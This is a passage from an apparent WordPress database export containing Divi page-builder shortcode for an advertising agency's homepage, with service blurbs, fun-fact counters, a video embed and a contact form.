_builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"New Lead From Website - whatthehell.co||et_pb_line_break_holder||||et_pb_line_break_holder||Name - %%Name%%||et_pb_line_break_holder||Email - %%Email%%||et_pb_line_break_holder||Company - %%Company%%||et_pb_line_break_holder||Message - %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 20:17:01','2020-07-08 20:17:01','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(280,1,'2020-07-08 21:10:12','2020-07-08 21:10:12','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" 